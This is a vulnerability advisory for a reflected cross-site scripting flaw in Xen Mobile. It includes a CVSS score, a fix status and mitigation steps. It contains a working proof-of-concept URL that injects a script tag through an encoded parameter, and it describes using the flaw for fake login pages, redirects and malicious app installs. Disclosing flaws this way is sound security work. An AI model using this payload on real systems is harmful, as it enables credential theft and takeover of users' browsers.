CVSS Summary
| Score | 5.8 Medium |
|---|---|
| Vector | Network |
| Complexity | Medium |
| Authentication | None |
| Confidentiality | Partial |
| Integrity | Partial |
| Availability | None |
Advisory:
Xen Mobile contains a reflected cross-site scripting vulnerability
Vulnerability
Last revised:
Xen Mobile can be tricked into displaying content of the attacker’s choosing. This could allow an attacker to take over the contents of a web page displayed to a user, enabling them to steal credentials or run arbitrary javascript on the user’s browser.
Current state: Fixed
Proof of concept
The following request shows arbitrary content to a user:
https://target/zdm/dynamictp/install.jsp?payload=%7b%22%74%79%70%65%22%3a%22%22%2c%22%70%6c%69%73%74%55%72%6c%22%3a%22%22%2c%22%69%70%61%5f%75%72%6c%22%3a%22%5c%22%3e%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%27%78%73%73%27%29%3c%2f%73%63%72%69%70%74%3e%22%2c%22%69%6d%61%67%65%5f%66%75%6c%6c%22%3a%22%22%2c%22%69%6d%61%67%65%5f%64%69%73%70%6c%61%79%22%3a%22%22%2c%22%62%75%6e%64%6c%65%5f%69%64%65%6e%74%69%66%69%65%72%22%3a%22%22%2c%22%62%75%6e%64%6c%65%5f%76%65%72%73%69%6f%6e%22%3a%22%22%2c%22%74%69%74%6c%65%22%3a%22%22%7d
This vulnerability could be used to display a fake login page, designed to look exactly like the legitimate one, but with modifications allowing us to steal user credentials.
Because it is possible to execute javascript, this vulnerability could also be used to redirect users to another location or to prompt them to install an application of an attacker’s choosing on their mobile device via Xen Mobile’s designed functionality.
Advisory timeline
Mitigation/further actions
- Remove public access to this service by moving it inside your network and configuring mobile devices to access it via a VPN or proxy that requires authentication
- Install an update rectifying this issue as soon as one is available